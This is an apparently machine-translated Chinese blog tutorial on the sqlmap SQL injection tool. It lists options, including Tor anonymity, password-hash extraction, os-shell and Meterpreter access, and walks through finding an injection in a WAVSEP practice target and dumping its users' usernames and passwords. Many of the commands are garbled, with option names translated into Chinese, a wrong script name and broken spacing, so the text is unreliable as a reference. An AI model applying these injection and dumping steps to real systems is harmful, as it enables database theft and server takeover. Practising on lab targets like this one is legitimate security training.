sqlmap指定注入方式,sqlmap注入sqlserver
最近我了解了一些关于SQL注入的事情。我自己做了一个wavsep无人机,作为练习的对象,然后有时间我会写一个wavsep教程。
首先下载并安装sqlmap.github门户网站:https://github.com/sqlmapproject/sqlmap/releases
I. sqlmap选项
目标:必须至少选择一个参数。
-u URL,-URL=URL目标是URL(例如。http://www.site.com/vuln.php?id=1’)
-g GOOGLEDORK将GOOGLEDORK的结果作为目标url。
请求:
这些选项可用于指定如何连接到目标URL。
-data=data数据字符串通过POST发送。
-cookie=cookie http cookie的值
- random-agent随机选择HTTP用户代理头的值。
- proxy=PROXY使用代理连接到目标URL。
tor使用匿名网络
- check-Tor检查Tor使用是否正确。
注射:
这些选项可用于指定要测试的参数,提供自定义注入负载和可选的篡改脚本。
-p测试参数可测试的参数
- dbms=dbms将后端DBMS强制设置为该值。
测试:
这些选项可用于定制检测阶段。
-LEVEL=水平测试水平(1-5,默认为1)
-RISK=执行测试的风险(1-3,默认为1)
技术:
这些选项可用于调整特定SQL注入的测试技术。
-technique=techsql注入技术选择(默认为“BEUSTQ”)
枚举:
这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,您可以运行自己的SQL语句。
-a,-all检索全部
-b,-横幅搜索横幅
-current-user检索当前用户
- current-db检索当前数据库
- passwords列出用户密码的哈希值。
-表格列出表格。
- columns列出字段。
- schema列出DBMS架构。
-dumpdumpdbms数据库表条目
-dump-所有DBMS数据库表的alldump条目
-D DB指定数据库
-T TBL指定表
-C COL指定字段
操作系统访问:
这些选项可用于访问后端数据库管理系统的底层操作系统。
- os-shell提示符是交互式操作系统shell。
-OS-pwn提示符是OOB壳牌、美特普莱特或VNC。
通用:
这些选项可用于设置一些常用的工作参数。
-批处理从不要求用户输入,使用默认行为。
- flush-session刷新当前目标的会话文件。
杂项:
-sqlmap-shell提示交互式sqlmap shell。
-简单的向导界面,适合向导初学者
二、sqlmap的使用
1.检测网址,确定是否有SQL注入。
python sqlmap.py -u url -批处理
运行后发现有注入,参数是用户名,注入类型是blind,数据库是mysql,后端语言是jsp。
2.获取数据库
Python map.py-u URL-DBS-batch获取所有数据库
python map . py-u URL-current-d b-batch获取当前数据库
得到当前数据库是wavsepDB。
3.获取当前数据库中的所有表
python sqlmap . py-u URL-D wavsepDB-表-批处理
4.获取表的字段。
python sqlmap . py-u URL-D wavsepDB-T用户-列-批处理
得到如图所示的字段后,我们开始转储字段的内容。
5 .转储字段内容
python sqlmap . py-u URL-D wavsepDB-T users-C 密码,用户名- dump - batch
如果字段很多,可以添加-start1-stop100,得到1-100条数据。
-dump可以替换为- dump-all以导出所有内容。
目前这只是最常规的使用,还需要更多的练习。
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。